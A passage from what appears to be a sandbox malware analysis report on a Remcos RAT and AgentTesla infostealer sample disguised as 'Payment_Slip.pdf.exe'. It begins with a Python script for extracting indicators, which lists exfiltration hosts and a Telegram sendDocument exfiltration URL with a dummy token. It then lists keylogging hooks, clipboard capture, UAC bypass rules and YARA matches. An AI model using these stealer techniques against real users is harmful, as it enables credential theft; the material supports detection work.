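    "fontbureau.com", "fonts.com", "apache.org", "carterandcone.com", "founder.com.cn",
    "galapagosdesign.com", "jiyu-kobo.co.jp", "sajatypeworks.com", "sakkal.com",
    "tiro.com", "typography.net", "urwpp.de", "zhongyicts.com.cn", "schemas.xmlsoap.org",
)
BACKGROUND_SOURCES = {"svchost.exe", "edb.log.10.dr", "qmgr.db.10.dr"}  # BITS/OneDrive, not the sample
EXFIL_HOSTS = {"api.telegram.org", "api.ipify.org", "smtp.gmail.com"}
CRED_TARGET_HOSTS = {"login.live.com", "login.yahoo.com", "www.google.com",
                     "www.imvu.com", "www.ebuddy.com"}


def parse_line(line):
    """Return (set of source process/file names, string value), or None if not a string line."""
    m = LINE_RE.match(line)
    if not m:
        return None
    # The source field alternates "<name>, <memory-dump id>"; keep only the names.
    sources = {s for s in m.group("src").split(", ") if not s.endswith(".sdmp")}
    return sources, m.group("val")


def classify(host, sources):
    if sources <= BACKGROUND_SOURCES:
        return "noise"  # seen only in the sandbox's own background activity
    if any(marker in host for marker in FONT_AND_LICENCE_NOISE):
        return "noise"  # substring match tolerates fused trailing bytes ("typography.netD")
    if host in EXFIL_HOSTS:
        return "exfil"
    if host in CRED_TARGET_HOSTS:
        return "credential_targets"
    return "review"  # unknown host: keep it for a human rather than drop it


def extract_iocs(lines):
    """Map bucket -> host -> sorted source names, plus every Telegram bot token found."""
    buckets = defaultdict(lambda: defaultdict(set))
    tokens = set()
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        sources, value = parsed
        for url in URL_RE.findall(value):
            try:
                host = urlsplit(url).hostname  # urlsplit lower-cases the host
            except ValueError:
                continue
            if not host:
                continue
            buckets[classify(host, sources)][host].update(sources)
            tokens.update(TG_TOKEN_RE.findall(url))
    result = {b: {h: sorted(s) for h, s in hosts.items()} for b, hosts in buckets.items()}
    result["telegram_tokens"] = sorted(tokens)
    return result


# Constructed excerpt in the report's own format. Hosts are the ones listed on
# the page; the bot token has the real shape but a made-up value.
FAKE_TOKEN = "1234567890:" + "AAF" + "x" * 32
SAMPLE_LINES = [
    "Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersG",
    "Source: Payment_Slip.pdf.exe, 00000000.00000002.1190307997.0000000006532000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.typography.netD",
    "Source: Payment_Slip.pdf.exe, 00000010.00000002.1225391140.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com",
    "Source: conserver.exe, 0000000D.00000002.3619471195.0000000003242000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002BA9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://smtp.gmail.com",
    "Source: host.exe, 0000000C.00000002.3622366959.0000000002691000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3621446588.000000000251C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.org/",
    f"Source: host.exe, 0000000C.00000002.3622366959.0000000002742000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot{FAKE_TOKEN}/sendDocument",
    "Source: Windows Update.exe, 0000001A.00000002.3620793390.0000000002A7C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://XlYyZVevQktG2Dz.orgt-",
    "Source: svchost.exe, 0000000A.00000003.1203278984.000001F041512000.00000004.00000800.00020000.00000000.sdmp, edb.log.10.dr, qmgr.db.10.dr String found in binary or memory: https://g.live.com/odclientsettings/ProdV2",
    "Source: Payment_Slip.pdf.exe String found in binary or memory: https://login.yahoo.com/config/login",
]

if __name__ == "__main__":
    for bucket, hosts in extract_iocs(SAMPLE_LINES).items():
        print(bucket, hosts)
```

Run it as a script to print the buckets, or call extract_iocs() on the whole strings section of a report. Treat any extracted token as a live credential: it authenticates to api.telegram.org as the attacker's bot, so keep it out of tickets and chat and use the api.telegram.org/bot.../sendDocument URL pattern, not the token value, as the detection string. Hosts in the review bucket (here the odd .org domain that the report shows with several different trailing bytes) need a manual look, since the noise filter deliberately errs toward keeping unknown hosts.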

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_00409340 SetWindowsHookExA 0000000D,0040932C,00000000 11_2_00409340 (idHook 0x0D is WH_KEYBOARD_LL, a global low-level keyboard hook; the callback at 0x0040932C receives every keystroke delivered on the desktop)
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\Payment_Slip.pdf.exe
Source: C:\Users\user\AppData\Roaming\host.exe Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\host.exe
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\conserver.exe
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\mykksg\mykksg.exe
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\mykksg\mykksg.exe
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_0040A65A OpenClipboard,GetClipboardData,CloseClipboard, 11_2_0040A65A
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_00414EC1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 11_2_00414EC1
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 14_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard, 14_2_0040987A
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 14_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, 14_2_004098E2
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 15_2_00406B9A EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, 15_2_00406B9A
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 15_2_00406C3D EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard, 15_2_00406C3D
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 16_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, 16_2_004068B5
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 16_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard, 16_2_004072B5
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: 17_2_00414EC1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 17_2_00414EC1
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_0040A65A OpenClipboard,GetClipboardData,CloseClipboard, 11_2_0040A65A
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_00409468 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx, 11_2_00409468
Source: C:\Users\user\AppData\Roaming\host.exe Window created: window name: CLIPBRDWNDCLASS (the OLE clipboard window class; on its own a weak indicator, since any process that touches the OLE clipboard creates one, but here it appears in every persistence binary alongside the low-level keyboard hook)
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Roaming\host.exe Code function: 12_2_06C3D1C0 GetKeyState,GetKeyState,GetKeyState, 12_2_06C3D1C0
Source: C:\Users\user\AppData\Roaming\host.exe Code function: 12_2_06C3D1D0 GetKeyState,GetKeyState,GetKeyState, 12_2_06C3D1D0

E-Banking Fraud

Source: Yara match File source: 7.2.mHTmhPhJy.exe.416f180.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.mHTmhPhJy.exe.41e47a0.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.mHTmhPhJy.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Payment_Slip.pdf.exe.3483d88.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Payment_Slip.pdf.exe.340e768.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.dwn.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.dwn.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.mHTmhPhJy.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.mHTmhPhJy.exe.41e47a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.mHTmhPhJy.exe.416f180.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Payment_Slip.pdf.exe.3483d88.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Payment_Slip.pdf.exe.340e768.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000002.1203872894.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.1205028524.0000000000BBA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3614974815.0000000002ECF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3614283187.00000000013DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.1224623594.00000000005FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.1223302187.0000000000456000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1251111243.000000000416F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.1224421328.0000000000456000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3611370738.0000000001330000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1187261780.000000000340E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Payment_Slip.pdf.exe PID: 8060, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Payment_Slip.pdf.exe PID: 7544, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: mHTmhPhJy.exe PID: 7856, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: mHTmhPhJy.exe PID: 5392, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: dwn.exe PID: 7300, type: MEMORYSTR
Source: Yara match File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\dwn.exe, type: DROPPED

Spam, unwanted Advertisements and Ransom Demands

Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_0041A76C SystemParametersInfoW, 11_2_0041A76C
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: 17_2_0041A76C SystemParametersInfoW, 17_2_0041A76C

System Summary

Source: 13.0.conserver.exe.d70000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 13.0.conserver.exe.d70000.0.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 7.2.mHTmhPhJy.exe.416f180.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 7.2.mHTmhPhJy.exe.416f180.4.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 7.2.mHTmhPhJy.exe.416f180.4.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 7.2.mHTmhPhJy.exe.41e47a0.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 7.2.mHTmhPhJy.exe.41e47a0.3.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 7.2.mHTmhPhJy.exe.41e47a0.3.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 11.2.mHTmhPhJy.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 11.2.mHTmhPhJy.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 11.2.mHTmhPhJy.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0.2.Payment_Slip.pdf.exe.3483d88.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.2.Payment_Slip.pdf.exe.3483d88.4.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.2.Payment_Slip.pdf.exe.3483d88.4.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0.2.Payment_Slip.pdf.exe.340e768.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.2.Payment_Slip.pdf.exe.340e768.3.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.2.Payment_Slip.pdf.exe.340e768.3.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.0.dwn.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 17.0.dwn.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.0.dwn.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.2.dwn.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 17.2.dwn.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.2.dwn.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 11.2.mHTmhPhJy.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 11.2.mHTmhPhJy.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 11.2.mHTmhPhJy.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 7.2.mHTmhPhJy.exe.41e47a0.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 7.2.mHTmhPhJy.exe.41e47a0.3.raw.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 7.2.mHTmhPhJy.exe.416f180.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 7.2.mHTmhPhJy.exe.416f180.4.raw.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0.2.Payment_Slip.pdf.exe.3483d88.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.2.Payment_Slip.pdf.exe.3483d88.4.raw.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0.2.Payment_Slip.pdf.exe.340e768.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.2.Payment_Slip.pdf.exe.340e768.3.raw.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0000000B.00000002.1203872894.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000000B.00000002.1203872894.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000000B.00000002.1203872894.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 00000011.00000000.1223302187.0000000000456000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000000D.00000000.1218959335.0000000000D72000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 00000007.00000002.1251111243.000000000416F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000011.00000002.1224421328.0000000000456000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000000.00000002.1187261780.000000000340E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: Payment_Slip.pdf.exe PID: 8060, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: mHTmhPhJy.exe PID: 7856, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: mHTmhPhJy.exe PID: 5392, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: conserver.exe PID: 8164, type: MEMORYSTR Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: Process Memory Space: dwn.exe PID: 7300, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\conserver.exe, type: DROPPED Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: C:\Users\user\AppData\Local\Temp\conserver.exe, type: DROPPED Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe, type: DROPPED Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe, type: DROPPED Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\dwn.exe, type: DROPPED Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\dwn.exe, type: DROPPED Matched rule: REMCOS_RAT_variants Author: unknown
Source: C:\Users\user\AppData\Local\Temp\dwn.exe, type: DROPPED Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: initial sample Static PE information: Filename: Payment_Slip.pdf.exe
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 14_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle, 14_2_0040DD85
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 14_2_00401806 NtdllDefWindowProc_W, 14_2_00401806
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 14_2_004018C0 NtdllDefWindowProc_W, 14_2_004018C0
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 15_2_004016FC NtdllDefWindowProc_A, 15_2_004016FC
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 15_2_004017B6 NtdllDefWindowProc_A, 15_2_004017B6
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 16_2_00402CAC NtdllDefWindowProc_A, 16_2_00402CAC
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 16_2_00402D66 NtdllDefWindowProc_A, 16_2_00402D66
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_00414DB4 ExitWindowsEx,LoadLibraryA,GetProcAddress, 11_2_00414DB4
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: 17_2_00414DB4 ExitWindowsEx,LoadLibraryA,GetProcAddress, 17_2_00414DB4
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe 41EB6FF6BA3D97A93130C3F670A1453B4FFA5F6CC8F7E8960A42648CFFEB2BD5
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\conserver.exe 41EB6FF6BA3D97A93130C3F670A1453B4FFA5F6CC8F7E8960A42648CFFEB2BD5
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Roaming\host.exe E6720928EA03235A4A2AE2183D8E82483EAB11C5D77EC554CA3D85CC69D244B2
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: String function: 00402073 appears 51 times
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: String function: 00432B90 appears 53 times
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: String function: 00432525 appears 42 times
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: String function: 004169A7 appears 87 times
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: String function: 0044DB70 appears 41 times
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: String function: 004165FF appears 35 times
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: String function: 00412968 appears 78 times
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: String function: 00421A32 appears 43 times
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: String function: 00416760 appears 69 times
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: String function: 0044407A appears 37 times
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: String function: 00402073 appears 51 times
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: String function: 00432B90 appears 53 times
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: String function: 00432525 appears 41 times
Source: Payment_Slip.pdf.exe, 00000000.00000002.1190274225.0000000004EC0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTL.dll" vs Payment_Slip.pdf.exe
Source: Payment_Slip.pdf.exe, 00000000.00000002.1186212278.00000000025A6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTL.dll" vs Payment_Slip.pdf.exe
Source: Payment_Slip.pdf.exe, 00000000.00000002.1185558701.000000000070E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs Payment_Slip.pdf.exe
Source: Payment_Slip.pdf.exe, 00000000.00000002.1186212278.00000000023A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs Payment_Slip.pdf.exe
Source: Payment_Slip.pdf.exe, 00000000.00000002.1186212278.00000000024BF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTL.dll" vs Payment_Slip.pdf.exe
Source: Payment_Slip.pdf.exe, 00000000.00000000.1136659538.0000000000110000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameImLd.exe4 vs Payment_Slip.pdf.exe
Source: Payment_Slip.pdf.exe, 00000000.00000002.1191644087.0000000008250000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMontero.dll8 vs Payment_Slip.pdf.exe
Source: Payment_Slip.pdf.exe, 00000005.00000002.3616615800.0000000004A34000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemspass.exe8 vs Payment_Slip.pdf.exe
Source: Payment_Slip.pdf.exe, 00000005.00000002.3616254884.00000000049BF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamef61e4e21-df97-4d15-8719-53241de53aab.exe4 vs Payment_Slip.pdf.exe
Source: Payment_Slip.pdf.exe, 00000005.00000002.3613632265.00000000013BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamef61e4e21-df97-4d15-8719-53241de53aab.exe4 vs Payment_Slip.pdf.exe
Source: Payment_Slip.pdf.exe, 00000005.00000002.3614283187.00000000013E0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamef61e4e21-df97-e vs Payment_Slip.pdf.exe
Source: Payment_Slip.pdf.exe Binary or memory string: OriginalFileName vs Payment_Slip.pdf.exe
Source: Payment_Slip.pdf.exe, 00000010.00000002.1225391140.000000000041B000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenamemspass.exe8 vs Payment_Slip.pdf.exe
Source: Payment_Slip.pdf.exe Binary or memory string: OriginalFilenameImLd.exe4 vs Payment_Slip.pdf.exe
Source: Payment_Slip.pdf.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 13.0.conserver.exe.d70000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 13.0.conserver.exe.d70000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 7.2.mHTmhPhJy.exe.416f180.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 7.2.mHTmhPhJy.exe.416f180.4.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 7.2.mHTmhPhJy.exe.416f180.4.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
